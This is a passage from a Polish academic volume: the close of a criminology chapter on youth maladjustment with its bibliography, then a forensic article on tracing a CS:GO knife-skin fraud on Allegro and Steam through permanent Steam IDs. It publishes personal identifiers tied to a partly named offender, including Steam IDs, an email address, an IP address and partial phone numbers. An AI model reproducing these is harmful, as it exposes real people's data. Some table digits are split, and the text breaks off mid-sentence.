prób ucieczki od sytuacji, wycofania, znalezienia własnej tożsamości, zrozumienia i
zwykłego wysłuchania. Ze strony młodych ludzi znajdujących się w kryzysie tożsamości
i na etapie poszukiwania swojego „egzystencjalnego ego”. Wszelkie gesty ze strony
najbliższych mają tu ogromne znaczenie.
Człowiek z zaburzeniami w funkcjonowaniu, szczególnie młody, które utrudniają
wypełnianie podstawowych ról i zadań stawianych przez społeczeństwo, wymaga
właściwej diagnostyki psychologicznej, czasami także psychiatrycznej. Brak reakcji i
pomocy ze strony otoczenia może doprowadzić do pogłębienia deficytów związanych z
komunikacją zewnętrzną, a także wewnętrzną. Z czasem konflikt ten może zostać
przekierowany na samego siebie, co przejawia się w różnych formach autodestrukcji (np.
próby i zamachy samobójcze).
Dla nauk zajmujących się jednostką społeczną i jej miejsca oraz roli w coraz
bardziej zdehumanizowanym społeczeństwie priorytetem staje się zadanie
zdiagnozowania zmieniających się uwarunkowań niedostosowania społecznego. Jego
obecny zakres, tak etiologiczny, jak i symptomatologiczny zmienia się i wskazuje
problemy badawcze, które do tej pory traktowano, jako mniej istotne, lub zbadane. Nie
można zaprzeczyć tezie dotyczącej ogromnego i nieograniczonego wpływu internetu na
rozwój w tym dojrzewanie społeczne pokolenia znajdującego w okresie adolescencji
psycho – społecznej.
W temacie opracowania zawarto stwierdzenie, a mianowicie „Kryminologia jako
nauka o sobie”, co niewątpliwie może budzić pewne wątpliwości, tak w płaszczyźnie
prawnej, psychologicznej, pedagogicznej, ale także moralnej. Zamysł przedstawienia
zaburzeń w socjalizacji ma charakter indywidualny i w każdym przypadku występowania
przejawów nieprzestrzegania zasad i wytyczonych społecznie norm postępowania
powinien być rozpatrywany oddzielnie. Nie mniej jednak etiologia i konsekwencje
dotyczą nas wszystkich, bez względu na pełnione role i pozycję społeczną. W tym
zakresie szczególnego znaczenia nabierają emocjonalne powiązania, głównie rodzinne i
ich wpływ na kształtowanie osobowości społecznej.
Każdy, tak zwany, „dorosły” oddziałuje w różnym stopniu na procesy związane z
uspołecznianiem dzieci i młodzieży. Świadomość zadań i odpowiedzialności powinna
stanowić wykładnię dla przedsięwzięć zapobiegawczych, których efektywność musi być
oparta na przeprowadzonej w odpowiednim czasie diagnostyce. Wymogiem staje się
zatem konieczność edukacji społeczeństwa, w szczególności w kierunku zrozumienia
zagrożeń związanych z adolescencją młodego pokolenia. To w tym właśnie okresie
dochodzi do często gwałtownych przemian psychofizycznych w nie dojrzałym
organizmie, w szczególności w strukturach poznawczych, które są istotną składową tzw.
„osobowości społecznej”. Psychika młodego człowieka jest bardzo plastyczna i tym
samym podatna na wpływy czynników spoza najbliższego otoczenia. W przypadku
zaburzonych relacji rodzinnych zasadniczy wpływ na jej kształtowanie odgrywają
rówieśnicy poprzez niekontrolowane kontakty i sposób spędzania wolnego czasu, często
w postaci różnych zachowań ryzykownych.
Rzeczywistość społeczna stawia co raz większe wyzwania w stosunku do
instytucji odpowiedzialnych za opiekę i wychowanie. W tym zakresie zauważa się także
198
wzrost oczekiwań ze strony rodziców. Bardzo często zapomina się jednak o tym, że ich
podstawowa działalność powinna być nakierowana na wspomaganie procesów
związanych z socjalizacją procesów przebiegających pierwotnie w rodzinie, wśród
najbliższych.
Zadaniem nauk zajmujących się funkcjonowaniem jednostki w społeczeństwie w
tym kryminologii, pedagogiki, psychologii, socjologii, jak również nauk prawnych staje
się konieczność zweryfikowania dotychczasowych ustaleń dotyczących wpływu
poszczególnych czynników o charakterze kryminogennych na zaburzenia w
zachowaniach i postawach, które najczęściej określa się mianem nieprzystosowania
społecznego. Przeprowadzenie kategoryzacji w ramach poszczególnych grup czynników
o bardzo różnorodnej strukturze i charakterze powinno pozwolić na określenie ich
właściwości predykcyjnych i wartościujących. Taka wiedza w praktyce powinna stać się
podstawą organizowania i wdrażania nowoczesnych oraz adekwatnych do zagrożenia
przedsięwzięć profilaktycznych.
Bibliografia
1. Błachut J.,Gaberle A.,Krajewski K., Kryminologia, Arche s.c., Gdańsk 2007.
2. Cierpiałowska L.,Soroko E., Zaburzenia osobowości. Problemy diagnozy
klinicznej. Wydawnictwo Naukowe UAM, Poznań 2017.
3. Czapów Cz., Wychowanie resocjalizujące, Warszawa 1978.
4. Gaberle A., Patologia społeczna, Warszawa 1993.
5. Glaser, S. Frosh D., Dziecko seksualnie wykorzystywane, PZWL, Warszawa
1995.
6. Hołyst B., Kryminologia, PWN, Warszawa 1999.
7. Hołyst B., Wiktymologia PWN, Warszawa 2006.
8. Jarosz M., (red.), Podstawy psychiatrii. Podręcznik dla studentów 5, Warszawa
1988.
9. Jaszczak – Kuźmińska D., Michalska K., Przemoc w rodzinie wobec osób
starszych i niepełnosprawnych. Poradnik dla pracowników pierwszego
kontaktu, Ministerstwo pracy i polityki społecznej, Warszawa 2010.
10. Jundziłł J., Dziecko – ofiara przemocy, WSiP, Warszawa 1993.
11. Kempe C. H., Silver H. K., Pediatria. Współczesne leczenie i diagnozowanie,
PZWL, Warszawa 1977.
12. Konopnicki J., Niedostosowanie społeczne, Warszawa 1971.
13. Kordacki J. (red.), Rozpoznawanie zespołu dziecka maltretowanego, Pamiętnik
II Ogólnopolskiego spotkania na temat : Ochrona dzieci przed okrucieństwem,
Łódź 1993.
14. Kozaczuk F., Wartości i postawy w różnych stadiach wykolejenia społecznego,
Wydawnictwo Uniwersytetu Rzeszowskiego, Rzeszów 2006.
15. Król - Fijewska M., Trening asertywności, Wyd. 1, Instytut Psychologii
Zdrowia i Trzeźwości, Polskie Towarzystwo Psychologiczne, Warszawa 1993.
16. Król - Fijewska M., Fijewski P., Asertywność menedżera, Wyd. 1, Polskie
Wydawnictwo Ekonomiczne, Warszawa 2000.
17. Krukowski A., (red.), Ustawa o postępowaniu w sprawach
nieletnich .Komentarz, Wydawnictwo Prawnicze, Warszawa 1991.
18. Lernell L.,, Zarys kryminologii ogólnej, PWN, Warszawa 1978.
19. Lew – Starowicz Z., Przemoc seksualna, Warszawa 1992.
199
20. Lipowski O., Resocjalizacja, Warszawa 1976.
21. Lipowska – Teutsch A., Rodzina a przemoc, Ośrodek Pomocy i interwencji
Psychologicznej Uniwersytetu Jagiellońskiego i Akademii Medycznej im.
Mikołaja Kopernika, PARPA, Kraków 1992.
22. Marek M., Niektóre problemy współczesnej kryminologii, „Zeszyty Naukowe
Instytutu Badania Prawa Sądowego”, nr. 6 1977.
23. Nowak A., Wysocka E., Problemy i zagrożenia społeczne we współczesnym
świecie. Element patologii społecznej i kryminologii, Kraków 2001.
24. Papież J., Płukis A., (red.), Przemoc dzieci i młodzieży. W perspektywie
polskiej transformacji ustrojowej, Wydawnictwo Adam Marszałek, Toruń
1998.
25. Podgórecki A., Patologia życia społecznego, Warszawa 1969.
26. Pomykało W., (red.), Encyklopedia Pedagogiczna, Fundacja Innowacja,
Warszawa 1993.
27. Pospiszy l., Źródła trwałości rodziny we współczesnym społeczeństwie,
„Problemy rodziny”, 1998.
28. Radochoński M., Podstawy psychopatologii dla pedagogów, Rzeszów 2001.
29. Seligman M.E.P., Walker E.W., Rosenhan D. L., Psychopatologia, Poznań
2003.
30. Szczepański J., Elementarne pojęcia socjologii, Warszawa 1970.
31. Szczęsny W. W., Zarys resocjalizacji z elementami patologii społecznej i
profilaktyki, Żak, Warszawa 2003.
32. Tracz – Dral J., Przemoc ekonomiczna, Kancelaria Senatu, Warszawa 2015.
33. Tyszkiewicz L., Kryminologia, Wydawnictwo Uniwersytetu Śląskiego,
Katowice 1983. 34. Urban B., Zaburzenia w zachowaniu i przestępczość
młodzieży, Kraków 2000.
34. Urban B., Stanik J. M., (red.), Resocjalizacja, T 2, PWN, Warszawa 2008.
35. Walczak S., Prawo penitencjarne PRL, Warszawa 1968.
36. Zimbardo P., Johnson R.L., McCann V., Psychologia: kluczowe koncepcje.
Psychologia osobowości, Warszawa 2010.
200
PRZY ODROBIENIE DOBREJ WOLI PLATFORMA STEAM NIE BĘDZIE
DOBRYM MIEJSCEM DLA OSZUSTÓW– DWA KAZUSY CS GO (COUNTER
STRIKE GLOBAL OFFENSIVE)
WITH GOODWILL STEAM PLATFORM WILL NOT BE A GOOD PLACE FOR
CHEATERS - TWO CASES OF CS GO (COUNTER STRIKE GLOBAL
OFFENSIVE)
Grzegorz MATYNIAK
Uczelnia Państwowa im. Jana Grodka w Sanoku
Streszczenie
Przedmiotem artykułu jest analiza dwóch spraw o oszustwo, związanych z
wykorzystaniem zarówno platformy Allegro.pl jak i platformy dystrybucji cyfrowej gier
oraz jednocześnie portalu społecznościowego Steam. Jest to kolejna już próba wykazania,
że w przypadku spraw internetowych należy dążyć do zabezpieczenia możliwie
największej ilości śladów cyfrowych oraz poddania ich szczegółowej analizie powiązanej
z odpowiednią interpretacją zabezpieczonych śladów.
Słowa kluczowe: ślady cyfrowe, internet, allegro.pl. Facebook.com,
store.steampowered.com, analiza kryminalna, czynności wykrywcze, metodyka działania
Summary
The subject of this article is an analysis of two fraud cases involving the use of both the
Allegro.pl platform and Steam - the digital distribution platform for games and at the
same time the social network for gamers. This is an attempt to show that in the case of
Internet cases, one should strive to secure as many digital traces as possible in order to
perform a detailed analysis linked to the appropriate interpretation of the secured traces.
Keywords: digital traces, internet, allegro.pl, Facebook.com, store.steampowered.com,
criminal analysis, detection activities, operation methodology
Wprowadzenie - wymagania formalne
Gry sieciowe od dawna są miejscem spotkań i wymiany towaru, jakie
potrzebny jest w grach tam funkcjonujących i co z tym związane są miejscem, gdzie żadni
szybkiego awansu i posiadania jak najlepszego sprzętu, poruszają się również nieuczciwi
gracze. Opiniując dla szeroko pojętych organów ścigania spotkałem się z różnymi
metodami działania sprawców i z różnym podejściem tychże organów do czynności
mających na celu ustalenia sprawcy. To nie czas i miejsce, by zajmować się tymi
sprawami, w których referenci podeszli do swoich czynności w sposób „mało
zaangażowany”. Oczywiście, zawsze może się zdarzyć ten „pierwszy raz”, kiedy sprawa
z jaką się spotkamy będzie dla nas nowa, sposób działania sprawcy będzie inny od tego
201
jaki znamy a i ślady jego działalności będą inne niż tradycyjne
2
. Jednak – co ważne –
brak zaangażowania, brak wiadomości i poszerzenia swojej wiedzy w żaden sposób nie
usprawiedliwia działania referenta jakiegokolwiek organu ścigania. Kiedy zdarza mi się
prowadzić wystąpienia lub brać udział w szkoleniach dla funkcjonariuszy organów
ścigania (chociażby Uczelnia Państwowa im. Jana Grodka w Sanoku) temat ten jest
obecny i w sposób „taktowny” poruszany. Uważam, że każdy z prowadzących
postępowanie przygotowawcze referentów sprawy, powinien podchodzić do niej w
sposób w jaki sam chciałby być potraktowany, a kwestia ilości prowadzonych spraw na
daną chwilę, jest tak naprawdę drugorzędna – wyjadacz wie już na początku czy z danej
sprawy coś będzie czy jest to tylko postępowanie z góry skazane na niewykrycie. Ale by
je za takowe uznać, musi się zapoznać z przyjętym zgłoszeniem oraz dokonać jego
analizy pod kątem co jest w sprawie, co można jeszcze pozyskać (oczywiście w
kontekście przydatności dla postępowania i ustalenia jego sprawcy) i jaki ma na to czas
(mam na myśli obowiązujące przypisy choćby w kontekście czasu przechowywania
danych retencyjnych).
Bo cyberprzestępstwo – o czym niejednokrotnie zapominają przełożeni -
to nie jest takie samo przestępstwo, jak kradzież telefonu komórkowego, jak posiadanie
środków odurzających, bójka i pobicie czy wypadek drogowy. Tu kryminalistyka w
klasycznym wydaniu nie działa – niektórzy uważają, że ślady kryminalistyczne, jak ślady
linii papilarnych, ślady DNA czy mechanoskopijne, niczym nie różnią się od śladów
cyfrowych, że są tak samo trwałe i niezmienne. I to jest podstawowy błąd występujący
na samym początku tego łańcucha – często pokutujący w prokuraturze, sądzie ale i - co
chyba gorsze - w Policji – BO TAK NIE JEST.
Ślady cyfrowe – jak wiadomo – są ulotne, łatwe do zmanipulowania,
czasami trudne do odzyskania i o czym zapominają laicy w tym temacie – najczęściej nie
mają postaci fizycznej, namacalnej, takiej, którą można dotknąć, zobaczyć „gołym okiem”
czy zabezpieczyć we fiolce, na folii czy za pomocą odlewu gipsowego. W tej materii
posiadanie odpowiedniego zasobu wiedzy wydaje się nieodzowne. Z nieznanych mi
powodów (ale występujących coraz częściej) niektórzy przełożeni nadzorujący czy to
piony dochodzeniowo-śledcze, zwalczania przestępczości gospodarczej ale też zajmujące
się stricte cyberprzestępczością oprócz tego, że sami nie posiadają tego rodzaju wiedzy
(sic!) to dodatkowo uniemożliwiają jej zdobywanie i poszerzanie podległym sobie
ludziom. Już słyszę te głosy, że przecież Policja posiada odpowiedni, zakupiony za duże
pieniądze sprzęt do zabezpieczania śladów elektronicznych, tak posiada - ale sprzęt to nie
wszystko. Nawet najlepszy sprzęt nie zastąpi ludzi a braki w wiedzy i szkoleniu,
niedostatek w doświadczeniu w żaden sposób nie zostaną zniwelowane najlepszym,
najdroższym nawet sprzętem, jeżeli referent sprawy nie będzie miał zasobu wiedzy
pozwalającego na interpretację już pozyskanych śladów lub – co chyba gorsze – na to
jakiego rodzaju śladów należy szukać i dążyć do ich zabezpieczenia.
Mając długoletnie doświadczenie w prowadzeniu postępowań
przygotowawczych, mogę – nieskromnie – powiedzieć, że teraz otrzymując do
opiniowania sprawę, już po kilku stronach czytania widzę, jakie jest do niej nastawienie
referenta, jakie jest jego doświadczenie i w którą stronę zmierza od samego początku. Ale
nie to będzie przedmiotem niniejszego artykułu. Uważam, że wstydem nie jest czasami
brak wiedzy (każdy ma jakieś braki w tym zakresie), ale brak podejmowanych działań by:
2
patrz: Grzegorz Matyniak, Czy wszystko jest ważne?; w: Kosiński J (red.), Przestępczość teleinformatyczna
2016, Szczytno 2017
202
• chcieć zmienić ten stan rzeczy,
• chcieć szkolić w tym zakresie ludzi mających efektywnie tymi zagadnieniami
się zajmować,
• chcieć skorzystać z wiedzy, którą posiadają inni, np. emerytowani
funkcjonariusze danych służb czy też osoby będące pomocnikami organów
ścigania.
Początkiem grudnia 2020r Posterunek Policji w Zagórzu przyjął
zawiadomienie o oszustwie przy sprzedaży przedmiotu w postaci „Nóż/kosa CS GO
Bowie Knife Doppler (Star Trak)” z gry Counter-Strike Global Offensive, jakie miało
miejsce na portalu Allegro.pl. Pokrzywdzony poinformował, że wykorzystując portal
aukcyjny Allegro.pl zaoferował do sprzedaży na aukcji nr 9984099478 wskazany
„Nóż/kosa CS GO Bowie Knife Doppler (Star Trak)” z opcja zakupu: „Kup teraz”.
Chętnym do zakupu okazał się użytkownik tego portalu posługujący się – jak się później
okazało nieprawdziwymi - danymi: Wiktor Juźwik, Gdańsk ul. Drelewicka 1, tel. 571 024
790, posługujący się na portalu kontem o nazwie: Client 94547000. Po ustaleniu
szczegółów przekazania dostępu do przedmiotu i po otrzymaniu wiadomości e-mail z
konta użytkownika Client 94336817 oraz będąc przekonanym, że należne pieniądze
zostały przekazane na jego konto nastąpiło przekazanie sprawcy linku umożliwiającego
przejęcie oferowanego przedmiotu osobie posługującej się nickiem „ZoriN”, nie
otrzymując w zamian ustalonej należności. Jak wynikało z zebranego materiału, oszust
na dzień 02.12.2020r na portalu www.steamcommunity.com posługiwał się nickiem
„ZoriN”. Do protokołu pokrzywdzony dołączył wydrukowaną korespondencję związaną
ze zdarzeniem, zaś końcem grudnia 2020r dodatkowo zeznał, że sprawca dokonał zmiany
nazwy użytkownika na platformie steampowered.com z nicka „ZoriN” na „DeVol`s” o
identyfikatorze ID 74837922713, dołączając kolejne wydruki związane ze zdarzeniem.
Prowadzący postępowanie referent pozyskał dane co do konta użytkownika o nazwie
Client:94547000 w portalu Allego, które potwierdziło że dane osobowe są nieprawdziwe
wskazane oraz że konto zostało założone w dniu 02.12.2020r – w dniu dokonanego
oszustwa – i że powiązane jest z kartą SIM o numerze abonenckim 571 024 790,
zarejestrowaną na fałszywe dane i powiązany z dwoma kolejnymi kontami utworzonymi
w domenie Allegro.pl
Rys. 1 Konto sprawcy z domeny Allegro (materiały własne)
DOWODY ZABEZPIECZONE PRZEZ POKRZYWDZONEGO I PRZEKAZANE
POLICJI
Pokrzywdzony za pośrednictwem posiadanego konta na portalu Allegro.pl
wystawił ogłoszenie informujące o chęci sprzedaży posiadanego przedmiotu w grze w
203
postaci: nóż/kosa CS GO Bowie Knife Doppler (StatTrak) z gry Counter-Strike Global
Offensive. Na jego ogłoszenie odpowiedziała, z wykorzystaniem aplikacji do kontaktów
użytkowników portalu Allegro.pl, osoba posiadająca konto na Allegro.pl o nazwie
Client:94547000. Kupujący podający się za „Wiktora Juźwik” przystał na nią i jako
potwierdzenie dokonania przelewu pieniędzy za towar przesłał pokrzywdzonemu zrzut
ekranowy rozpoczęcia dokonywania transakcji oraz link do dokonania wymiany
wystawionego przez
pokrzywdzonego towaru.
204
205
Rys. 2 Treść korespondencji (materiały własne)
Rys. 3 Oferta wymiany (materiały własne)
Rys. 4 Informacja o wyborze sposobu zapłaty (materiały własne)
206
Rys. 5 Dane odbiorcy (materiały własne)
Pokrzywdzony - nie mając wątpliwości co do przebiegu transakcji i
otrzymania płatności - wysyłał do kupującego kod dostępu pozwalający na przejęcie
wystawionego do sprzedaży przedmiotu. Pozwoliło to sprawcy na dokonanie przejęcie
przedmiotu zupełnie za darmo, gdyż wysłana informacja dotyczyła jedynie procesu
rozpoczęcia płatności (który w każdej chwili może być anulowany przez płacącego) a nie
informacją o dokonanej zapłacie.
207
ANALIZA ZABEZPIECZONYCH ŚLADÓW ELEKTRONICZNYCH
Mając na uwadze powyższe zabezpieczone przez pokrzywdzonego zrzuty
dot. korespondencji oraz zmian nazwy użytkownika na portalu steamcommunity.com,
ustalono, że sprawcą oszustwa jest osoba korzystająca z konta o danych Vadim (na dzień
06.02.2021r), co potwierdziły zabezpieczone w ramach dokonanego wywiadu jawno-
źródłowego czynności, które wykazały, że w czasie wymiany użytkownikiem
przejmującym przedmiot od sprzedającego był użytkownik społeczności
www.steamcommunity.com o danych: ZoriN.
Jak ustalono, w wyniku przeprowadzonych czynności w ramach OSINT,
użytkownik ten posiadał konto o unikalnych identyfikatorach:
• steam3ID: [U:1:1100300706],
• steamID32: STEAM_0:0:550150353,
• steamID64: http://steamcommunity.com/profiles/76561199060566434,
• custom URL:
https://steamcommunity.com/id/08326667777938383837372928
• steamrep: http://steamrep.com/profiles/76561199060566434
które jak ustalono związane są z kontem użytkownika, którym jest Kamil R.
KONTO NA PORTALU STEAM:
Informacje pozyskane z zasobów sieci Internet
ZoriN (stan na 02.12.2020r)
Rys.6 Awatar użytkownika ZoriN (materiały własne)
Użytkownik: Vadim (stan na 06.02.2021r)
Rys. 7 Awatar użytkownika Vadim (materiały własne)
Użytkownik: Dejzi (stan na 06.04.2021r)
Rys.8 Awatar użytkownika Dejzi (materiały własne)
208
KONTO NA PORTALU STEAM: Vadim
Informacje pozyskane przez organy ścigania od Valve
Użytkownik: Vadim
Rys.9 Awatar użytkownika Vadim (materiały własne)
Adres e-mail: ujarqny.poczta@interia.pl – adres e-mail
został zweryfikowany
Telefon zarejestrowany i zweryfikowany na koncie użytkownika:
L.p
Nr telefonu
Data dodania
Data weryfikacji
Status
1
576 989 xxx
Kamil R.
23.05.2020r
23.05.2020r
zweryfikowany
SZCZEGÓŁY PROFILU (według stanu na dzień 29.01.2021r - otrzymanie odpowiedzi
z Valve)
• steamID3: [U:1:1100300706],
• steamID32: STEAM_0:0:550150353,
• steamID64: http://steamcommunity.com/profiles/76561199060566434,
• Country: Ukraine
• "Real" Name:
• Profile URL: 08326667777938383837372928
• custom URL:
https://steamcommunity.com/id/08326667777938383837372928
KONTO NA PORTALU STEAM: Vadim
Informacje pozyskane w wyniku przeszukania dostępnych jawnych zasobów sieci
Internet
Użytkownik konta od dnia: 23.05.2020r
Użytkownik: Vadim (stan na 06.02.2021r)
Rys. 10 Awatar użytkownika Vadim (materiały własne)
209
Tabela 1. Zmiany (wybrane) pseudonimów użytkownika: ZoriN (stan na 06.04.2021r)
Data
Zmiana
pseudonimu
steam3ID
steamID32
steamID64
23.03.2021
Dejzi
[U:1:1100300706]
STEAM_0:0:550150353
steamcommunity.com/profiles/76561199060566434
12.03.2021
hitsu
[U:1:1100300706]
STEAM_0:0:550150353
steamcommunity.com/profiles/76561199060566434
05.03.2021
Hummy
[U:1:1100300706]
STEAM_0:0:550150353
steamcommunity.com/profiles/76561199060566434
13.02.2021
Viktor
[U:1:1100300706]
STEAM_0:0:550150353
steamcommunity.com/profiles/76561199060566434
29.01.2021
Vadim
[U:1:1100300706]
STEAM_0:0:550150353
steamcommunity.com/profiles/76561199060566434
*
szyszka
[U:1:1100300706]
STEAM_0:0:550150353
steamcommunity.com/profiles/76561199060566434
20.01.2021
kamyk
[U:1:1100300706]
STEAM_0:0:550150353
steamcommunity.com/profiles/76561199060566434
*
stone
[U:1:1100300706]
STEAM_0:0:550150353
steamcommunity.com/profiles/76561199060566434
*
żelek
[U:1:1100300706]
STEAM_0:0:550150353
jw
29.12.2020
De Vol`s
[U:1:1100300706]
STEAM_0:0:550150353
steamcommunity.com/profiles/76561199060566434
*
ZoriN
[U:1:1100300706]
STEAM_0:0:550150353
steamcommunity.com/profiles/76561199060566434
*
hanori
[U:1:1100300706]
STEAM_0:0:550150353
jw
*
De vol
[U:1:1100300706]
STEAM_0:0:550150353
jw
*
Viner!
[U:1:1100300706]
STEAM_0:0:550150353
jw
22.10.2020
Volter
[U:1:1100300706]
STEAM_0:0:550150353
jw
*
hykee-thegame
[U:1:1100300706]
STEAM_0:0:550150353
jw
*Brak wpisu w kolumnie: „Data” wynika z braku możliwości precyzyjnego ustalenia daty dokonanej zmiany w nazwie użytkownika.
210
Rys. 11 Link permanentny dla użytkownika oraz widoczne zmiany nazw (materiały własne)
Potwierdzeniem dokonywania częstych zmian nazw (nicku) użytkownika
portalu Steam przez sprawcę posługującego się podczas oszustwa nazwą ZoriN, były w
szczególności dołączone zrzuty ekranowe dot. użytkownika o nicku ‘szyszka” oraz
„Vadim” i widoczny w górnej części indywidualny (permanent link) numer ID z profilem
użytkownika steamcommunity o ID 76561199060566434
Rys. 12 Dane użytkownika wraz z linkiem permanentnym (materiały własne)
Analiza dostępnych zasobów sieciowych – przez biegłego podczas
opiniowania w tej sprawie - wykazała ponadto bezsprzeczną tożsamość unikalnych
identyfikatorów między użytkownikami portalu Steam o nazwach: De Vol`s, szyszka,
Vadim czy ostatnia przed usunięciem konta - Dejzi (oraz innych wykazanych w tabeli
powyżej). Przykładowe zbieżności zawierały zabezpieczone zrzuty ekranowe
przekazane biegłemu przez pokrzywdzonego (drogą elektroniczną), a w przypadku Dejzi
(pozyskany drogą OSINT z internetu)
211
Rys. 13 Dane użytkownika wraz z linkiem (materiały własne)
Rys. 14 Dane użytkownika wraz z linkiem permanentnym (materiały własne)
Rys. 15 Dane użytkownika wraz z linkiem permanentnym (materiały własne)
212
Rys. 16 Dane użytkownika wraz z linkiem (materiały własne)
TRANSAKCJE DOKONANE PRZEZ POKRZYWDZONEGO I INFORMACJE
O NICH ZAWARTE NA PORTALU STEAM
Jak wynikało z dostarczonych przez pokrzywdzonego zrzutów ekranowych
dot. transakcji na jego koncie na platformie Steam odnotowywane były wszystkie
transakcje, jakie zostały przez niego wykonane, w tym widoczna transakcja z dnia
02.12.2020r godz. 20:57, wykonana z użytkownikiem o nicku De Vol`s.
Z zeznań pokrzywdzonego wynikało, że na dzień 29.12.2020r sprawca
oszustwa posługiwał się już zmienionym nickiem użytkownika tzn. De Vol`s, a nie tym z
jakiego korzystał dokonując wymiany czyli: ZoriN. O tym, że strona Steam
automatycznie aktualizuje dane dot. nazwy nicka używanego aktualnie przez
użytkowników, świadczą zamieszczone zrzuty ekranowe dostarczone przez
pokrzywdzonego, zarówno w dniu 29.12.2020r, jak i dostarczone biegłemu w terminach
późniejszych, z których to wynika bezspornie, że użytkownik, z którym doszło do
oszukańczej wymiany to (stan na dzień 29.01.2021r) – użytkownik na ten dzień
posługującym się nickiem - Vadim.
Rys 17 Widok konta użytkownika (na dzień 29.12.2020r) (materiały własne)
213
Rys. 18 Widok konta użytkownika (między 20.01.2021r a 29.01.2021r) (materiały własne)
Rys. 19 Widok konta użytkownika (na dzień 29.01.2021r) (materiały własne)
Rys. 20 Widok konta użytkownika (na dzień 26.04.2021r – z informacji wynika, że konto zostało
usunięte) (materiały własne)
Przykładem działania jednoznaczności tej identyfikacji, jest aktualizacja
nazwy następująca automatycznie, niezwłocznie po zmianie nazwy przez użytkownika
na nową – a w ostatnim przypadku informuje o usunięciu przedmiotowego konta wraz z
danymi użytkownika. Co ważne – z uwagi na fakt, iż możliwe jest, że podczas zakładania
konta na www.steamcommunity.com jeden lub kilku użytkowników będzie używało
takiej samej nazwy, to właśnie adres URL (mogący podlegać zmianom przez
użytkownika) oraz przede wszystkim indywidualny, niezmienny i stały identyfikator
steamcommunity (permanent link) są tymi, które jednoznacznie zidentyfikują
właściwego użytkownika.
214
Rys. 21. Przebieg identyfikacji
sprawcy oszustwa w opiniowanej
sprawie posługującego się nazwą
użytkownika „ZoriN” (na podstawie
danych znajdujących się w aktach
sprawy i dokonanego wywiadu OSINT)
(materiały własne)
215
Ze wskazanym wyżej użytkownikiem konta Steam powiązane było konto
poczty elektronicznej o nazwie: ujarqny.poczta@interia.pl
które zostało założone w dniu 23.05.2020r o godz.21:07:58 z adresu IP
83.26.55.65 (port 55534) – użytkownik końcowy usługi Neostrada – Kamil R, zam.
Jelenia Góra i z tego samego adresu logowano się również po raz ostatni w tym samym
dniu 23.05.2020r godz.21:07:59 z adresu IP 83.26.55.65 (port 50489) – użytkownik
końcowy usługi Neostrada – Kamil R, zam. Jelenia Góra
Imię i nazwisko: ujarqny poczta
Tabela 2. Logowania do konta pocztowego: ujarqny.poczta@interia.pl
D
data
G
godzina
A
adres IP
Uwagi/użytkownika końcowy i adres
świadczenia usługi
2
3.05.2020
2
1:07:58
8
3.26.55.65 port
55534
uKVxxxx@neostrada.pl/Kamil R, zam. Jelenia
Góra
2
3.05.2020
2
1:07:59
8
3.26.55.65 port
36914
uKVxxxx@neostrada.pl/Kamil R zam. Jelenia
Góra
2
3.05.2020
2
1:07:59
8
3.26.55.65 port
50489
uKVxxxx@neostrada.pl/Kamil R,zam. Jelenia
Góra
2
3.05.2020
2
1:08:00
8
3.26.55.65 port
49008
uKVxxxx@neostrada.pl/Kamil R, zam. Jelenia
Góra
2
3.05.2020
2
1:08:02
8
3.26.55.65 port
42336
uKVxxxx@neostrada.pl/Kamil R, zam. Jelenia
Góra
2
3.05.2020
2
1:08:35
8
3.26.55.65 port
60142
uKVxxxx@neostrada.pl/Kamil R, zam. Jelenia
Góra
2
3.05.2020
2
1:14:35
8
3.26.55.65 port
60916
uKVxxxx@neostrada.pl/Kamil R, zam. Jelenia
Góra
2
3.05.2020
2
1:15:02
8
3.26.55.65 port
44948
uKVxxxx@neostrada.pl/Kamil R, zam. Jelenia
Góra
2
3.05.2020
2
1:15:33
8
3.26.55.65 port
44464
uKVxxxx@neostrada.pl/Kamil R, zam. Jelenia
Góra
2
3.05.2020
2
1:15:37
8
3.26.55.65 port
54094
uKVxxxx@neostrada.pl/Kamil R, zam. Jelenia
Góra
Założenie poczty elektronicznej – służącej do potwierdzenia tożsamości
przy zakładaniu konta użytkownika w domenie Steam, nastąpiło w dniu 23.05.2020r z
adresu IP 83.26.55.65 należącego do usługi Neostrada operatora Orange Polska, którego
użytkownikiem końcowym – jak wynikało z odpowiedzi uzyskanej od operatora - był
Kamil R, zam. Jelenia Góra. Jak wynikało z materiałów sprawy, z tego samego adresu IP
216
doszło w tym samym dniu (23.05.2020r), do rejestracji i założenia konta użytkownika w
domenie Steam.
Diagram 1 – powiązania osoby sprawcy z kontem na platformie Steam i
używanymi tam nazwami (materiały własne)
217
Diagram 2 – występujące powiązania między osobą sprawcy, kontem tego
użytkownika na platformie Steamcommunity o nazwie ZoriN, wskazanymi
użytkownikami portalu Allegro.pl (materiały własne)
218
Diagram 3 – występujące powiązania między kontem użytkownika na
platformie Steam permanentnym linku
steamcommunitu.com/profiles/76561199060566434 a nazwami użytkownika: m.in.
ZoriN, Vadim, Dejzi i inne (materiały własne)
219
Diagram 4 – występujące powiązania między osobą sprawcy, kontem tego użytkownika
na platformie Steam o permanentnym linku
steamcommunitu.com/profiles/76561199060566434, używanymi nazwami konta oraz
oszukańczą wymianą z pokrzywdzonym. (materiały własne)
Osoba, która dokonała wyłudzenia przedmiotu posługiwała się wtedy (w
dniu 02.12.2020r) nickiem „ZoriN” - jak wykazano w wyniku zabezpieczonych
materiałów znajdujących się w sieci - jest tożsama z użytkownikiem posługującym się
m.in. nickami: De Vol`s, szyszka, Vadim czy też ostatnio Dejzi - a te - jak wynika z
materiałów otrzymanych z Valve, były użytkowane przez osobę posługująca się
telefonem o zweryfikowanym nr 576 989 XXX, który to numer zarejestrowany był na
Kamila R i powiązany z adresem poczty e-mail: ujarqny.poczta@interia.pl
Należy tutaj wyjaśnić, iż każdy użytkownik portalu
www.steamcommunity.com posiada swoje indywidualne, niepowtarzalne oznaczenie, po
którym jest identyfikowalny przez ten portal – chodzi o oznaczenia steamID3,
steamID32 oraz steamID64 (tzw. permanent link).
Wyglądały one następująco w przypadku użytkownika o nazwie: Vadim
• steamID3: [U:1:1100300706]
• steamID32: STEAM_0:0:550150353
• steamID64:
http://steamcommunity.com/profiles/76561199060566434 –
permanent link
220
Potwierdza to również dołączony przez pokrzywdzonego do protokołu
przesłuchania zrzut ekranowy dot. użytkownika o nazwie: De Vol`s, dla którego adres
custom URL jest następujący:
https://steamcommunity.com/id/74837922713
Zebrany przez organy procesowe materiał dowodowy oraz przedstawiona
opinia z zakresu analizy kryminalistycznej tych pozyskanych śladów, sprawiły, że sąd nie
miał wątpliwości co do wydania wyroku skazującego w przedmiotowej sprawie.
Prokuratura Rejonowa w Sanoku nadzorowała prowadzone przez
